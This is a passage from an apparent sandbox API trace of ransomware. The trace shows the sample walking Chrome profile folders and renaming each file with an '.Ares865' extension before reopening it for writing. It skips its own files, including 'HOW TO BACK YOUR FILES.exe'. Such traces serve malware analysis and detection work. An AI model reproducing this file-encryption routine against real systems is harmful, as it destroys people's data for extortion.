param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal.Ares865") returned 171 [0099.997] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal.ares865"), dwFlags=0x1) returned 1 [0099.998] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.999] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0099.999] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0099.999] CloseHandle (hObject=0x0) returned 0 [0099.999] CloseHandle (hObject=0x118) returned 1 [0099.999] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4dec1d40, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4dec1d40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0099.999] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0099.999] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4dec1d40, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4dec1d40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0099.999] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0099.999] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a70 [0099.999] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Extension Settings", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Extension Settings") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Extension Settings" [0100.000] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi" [0100.000] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log.Ares865") returned 153 [0100.000] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log.ares865"), dwFlags=0x1) returned 1 [0100.001] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.002] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0100.002] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0100.002] CloseHandle (hObject=0x0) returned 0 [0100.002] CloseHandle (hObject=0x118) returned 1 [0100.002] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8642cdf0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8642cdf0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8642cdf0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x10, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CURRENT", cAlternateFileName="")) returned 1 [0100.002] lstrcmpiW (lpString1="CURRENT", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.002] lstrcmpiW (lpString1="CURRENT", lpString2="aoldtz.exe") returned 1 [0100.002] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\CURRENT.Ares865") returned 150 [0100.002] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\current"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\CURRENT.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\current.ares865"), dwFlags=0x1) returned 1 [0100.004] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\CURRENT.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\current.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.004] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16) returned 1 [0100.009] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOCK.Ares865") returned 147 [0100.009] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\lock"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOCK.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\lock.ares865"), dwFlags=0x1) returned 1 [0100.010] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOCK.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\lock.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.010] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0100.010] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0100.011] CloseHandle (hObject=0x0) returned 0 [0100.011] CloseHandle (hObject=0x118) returned 1 [0100.011] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8642cdf0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8642cdf0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x97256fb0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xc4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LOG", cAlternateFileName="")) returned 1 [0100.011] lstrcmpiW (lpString1="LOG", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0100.011] lstrcmpiW (lpString1="LOG", lpString2="aoldtz.exe") returned 1 [0100.011] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG.Ares865") returned 146 [0100.011] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\log"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\log.ares865"), dwFlags=0x1) returned 1 [0100.012] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\log.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.012] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=196) returned 1 [0100.016] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\MANIFEST-000001.Ares865") returned 158 [0100.016] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\manifest-000001"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\MANIFEST-000001.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\manifest-000001.ares865"), dwFlags=0x1) returned 1 [0100.017] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\MANIFEST-000001.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\manifest-000001.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.018] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=41) returned 1 [0100.021] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld" [0100.022] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B03.tmp.Ares865") returned 110 [0100.022] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B03.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\jumplisticonsold\\2b03.tmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B03.tmp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\jumplisticonsold\\2b03.tmp.ares865"), dwFlags=0x1) returned 1 [0100.025] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B03.tmp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\jumplisticonsold\\2b03.tmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.025] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0100.025] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0100.025] CloseHandle (hObject=0x0) returned 0 [0100.025] CloseHandle (hObject=0x118) returned 1 [0100.025] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85096390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85096390, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85096390, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2B04.tmp", cAlternateFileName="")) returned 1 [0100.025] lstrcmpiW (lpString1="2B04.tmp", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.025] lstrcmpiW (lpString1="2B04.tmp", lpString2="aoldtz.exe") returned -1 [0100.026] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B04.tmp.Ares865") returned 110 [0100.026] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B04.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\jumplisticonsold\\2b04.tmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B04.tmp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\jumplisticonsold\\2b04.tmp.ares865"), dwFlags=0x1) returned 1 [0100.027] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B04.tmp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\jumplisticonsold\\2b04.tmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.027] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0100.027] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0100.027] CloseHandle (hObject=0x0) returned 0 [0100.027] CloseHandle (hObject=0x118) returned 1 [0100.027] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4dee7ea0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4dee7ea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0100.027] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0100.027] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4dee7ea0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4dee7ea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0100.027] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0100.028] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a30 [0100.028] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\JumpListIcons", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\JumpListIcons") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\JumpListIcons" [0100.028] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A058.tmp.Ares865") returned 107 [0100.028] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A058.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\jumplisticons\\a058.tmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A058.tmp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\jumplisticons\\a058.tmp.ares865"), dwFlags=0x1) returned 1 [0100.030] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A058.tmp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\jumplisticons\\a058.tmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.031] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0100.031] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0100.031] CloseHandle (hObject=0x0) returned 0 [0100.031] CloseHandle (hObject=0x118) returned 1 [0100.031] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x96ec4eb0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x96ec4eb0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x96ec4eb0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="A059.tmp", cAlternateFileName="")) returned 1 [0100.031] lstrcmpiW (lpString1="A059.tmp", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.031] lstrcmpiW (lpString1="A059.tmp", lpString2="aoldtz.exe") returned -1 [0100.031] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A059.tmp.Ares865") returned 107 [0100.031] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A059.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\jumplisticons\\a059.tmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A059.tmp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\jumplisticons\\a059.tmp.ares865"), dwFlags=0x1) returned 1 [0100.032] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A059.tmp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\jumplisticons\\a059.tmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.033] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0100.033] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0100.033] CloseHandle (hObject=0x0) returned 0 [0100.033] CloseHandle (hObject=0x118) returned 1 [0100.033] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4dee7ea0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4dee7ea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0100.033] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0100.033] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4dee7ea0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4dee7ea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0100.033] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 